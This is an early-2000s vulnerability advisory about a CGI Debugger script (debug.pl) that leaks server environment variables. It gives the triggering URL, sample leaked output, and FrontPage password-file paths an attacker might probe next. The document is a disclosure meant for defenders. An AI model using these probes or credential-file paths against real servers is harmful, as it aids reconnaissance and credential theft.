NeoErudition Technologies

                                           By: Lawrence Lavigne


Vulnerabillity:  CGI Debugger v1.0 
        Remote:  YES
          Risk:  HIGH


I have not found any information on Packetstorm or Security-Focus about this issue but that is not to say it has not been addressed elsewhere. But for the security communities sake I will release what I can now.

Enviroment Variables can be gleamed from a server running /cgi-bin/debug.pl by passing a bogus arguement to the
script.  

Example: http://www.domain.com/cgi-bin/debug.pl/*  will produce:


DOCUMENT_ROOT        "/usr/home17/dir/public_html"
GATEWAY_INTERFACE    "CGI/1.1"
HTTP_ACCEPT          "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, */*"
HTTP_ACCEPT_ENCODING "gzip, deflate" 
HTTP_ACCEPT_LANGUAGE "en-us"
HTTP_CONNECTION      "Keep-Alive" 
HTTP_COOKIE          "$1" 
HTTP_HOST            "www.domain.com" 
HTTP_USER_AGENT      "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 
LOG_DIR              "/usr/local/etc/httpd/log6/dir" 
PATH                 "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin" 
QUERY_STRING         "" 
REMOTE_ADDR          "XXX.XXX.XXX.XXX" 
REMOTE_PORT          "3899" 
REQUEST_METHOD       "GET" 
REQUEST_URI          "/directory/cgi-bin/debug.pl/<script_name>" 
REWRITE_ROOT         "/usr/home17/dir/public_html" 
SCRIPT_FILENAME      "/usr/home17/dir/public_html/directory/cgi-bin/<script_name>" 
SCRIPT_NAME          "/directory/cgi-bin/*" 
SCRIPT_URI           "http://www.domain.com/directory/cgi-bin/debug.pl/<script_name>" 
SCRIPT_URL           "/directory/cgi-bin/debug.pl/*" 
SERVER_ADDR          "XXX.XXX.XXX.XXX" 
SERVER_ADMIN         "admin@domain.com" 
SERVER_NAME          "www.domain.com" 
SERVER_PORT          "80" 
SERVER_PROTOCOL      "HTTP/1.1" 
SERVER_SIGNATURE      "" 
SERVER_SOFTWARE      "Apache/1.3 (Unix) mod_perl/1.27 PHP/4.2.2 mod_fastcgi/2.2.12 FrontPage/5.0.2.2510 mod_jk/1.2.0                               mod_ssl/2.8.10 OpenSSL/0.9.6e" 
UNIQUE_ID            "PW1BEdH5k-4AAYO7Thw" 

CANNOT EXECUTE::  /usr/home17/dir/public_html/directory/cgi-bin/<script_name>


NOTE: This servers IP, domain and other sensitive information has been omitted.



Note the information provided about SERVER_SOFTWARE. Apache version 1.3 (Unix), wich an attacker may be aware that
it has a remote vulnerabillity  that will permit remote execution of arbituary commands.  FrontPage 5.0.2.2510 may have 
no current known vulnerabillities but could tip off an attacker to check for varied Vermeer Technology Incorperated vti_pvt vulnerabillities such as /vti_pvt/service/pwd, /vti_pvt/administrators.pwd etc. Thankfully OpenSSL 0.9.6e does not suffer
the arbituary code execution vulnerabillity but seems moot considering what information debug.pl may provide an
attacker with.

SERVER_SOFTWARE is not the only sensitive information being provided in this list by any means. A skilled intruder
can make use of much else that is here wich I will not be detailed here.

Furthermore, executing debug.pl without an argument prompts for a script to execute or debug.
Example: http://www.domain.com/cgi-bin/debug.pl<enter>, will give the follow output:

Usage: /directory/cgi-bin/debug.pl/script-to-run

By the following information provided and mayhaps a quick audit, an intruder may be able to collect enough information
to successfully guess any possible scripts to run debug.pl against. Possible Code Injection ? Heap Overflow ?
  


NeoErudition Technologies
Lawrence Lavigne
administrator@neoerudition.net
http://neoerudition.net